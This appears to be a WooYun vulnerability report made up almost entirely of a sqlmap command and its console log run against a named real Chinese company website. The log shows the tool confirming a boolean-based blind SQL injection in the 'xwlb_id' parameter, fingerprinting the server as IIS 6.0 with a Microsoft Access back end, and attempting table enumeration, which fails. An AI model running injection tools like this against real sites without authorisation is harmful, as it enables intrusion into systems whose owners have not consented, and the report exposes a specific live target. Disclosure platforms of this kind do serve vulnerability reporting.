WooYun.org

python sqlmap.py -u "http://www.jishunda.cn/News.asp?xwlb_id=36" --table

[04:57:27] [INFO] testing connection to the target url
[04:57:28] [INFO] testing if the url is stable, wait a few seconds
[04:57:59] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[04:58:01] [INFO] url is stable
[04:58:01] [INFO] testing if GET parameter 'xwlb_id' is dynamic
[04:58:01] [INFO] heuristics detected web page charset 'GB2312'
[04:58:01] [INFO] confirming that GET parameter 'xwlb_id' is dynamic
[04:58:01] [WARNING] GET parameter 'xwlb_id' appears to be not dynamic
[04:58:01] [WARNING] reflective value(s) found and filtering out
[04:58:01] [INFO] heuristic test shows that GET parameter 'xwlb_id' might be injectable (possible DBMS: Microsoft Access)
[04:58:01] [INFO] testing for SQL injection on GET parameter 'xwlb_id'
[04:58:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[04:58:02] [INFO] GET parameter 'xwlb_id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable 
parsed error message(s) showed that the back-end DBMS could be Microsoft Access. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
[04:58:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[04:58:29] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other injection technique found
[04:59:04] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[04:59:05] [INFO] target url appears to be UNION injectable with 4 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[04:59:40] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[04:59:41] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. --dbms=mysql) 
[04:59:41] [INFO] checking if the injection point on GET parameter 'xwlb_id' is a false positive
GET parameter 'xwlb_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection points with a total of 46 HTTP(s) requests:

---
Place: GET
Parameter: xwlb_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: xwlb_id=36 AND 3949=3949
---
[04:59:46] [INFO] testing Microsoft Access
[05:00:10] [INFO] confirming Microsoft Access
[05:00:10] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[05:00:10] [INFO] fetching tables for database: 'Microsoft_Access_masterdb'
[05:00:10] [INFO] fetching number of tables for database 'Microsoft_Access_masterdb'
[05:00:10] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[05:00:10] [INFO] retrieved: 
[05:00:10] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' and/or switch '--hex'
[05:00:10] [WARNING] unable to retrieve the number of tables for database 'Microsoft_Access_masterdb'
[05:00:10] [ERROR] cannot retrieve table names, back-end DBMS is Access